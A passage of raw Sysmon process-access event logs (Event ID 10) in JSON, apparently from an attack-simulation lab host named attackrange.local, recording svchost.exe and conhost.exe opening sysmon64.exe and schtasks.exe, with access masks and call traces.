C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5711,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5712,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5713,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5714,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5715,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5716,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5717,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010F6570800}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010F6570800}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5718,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010F6570800}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 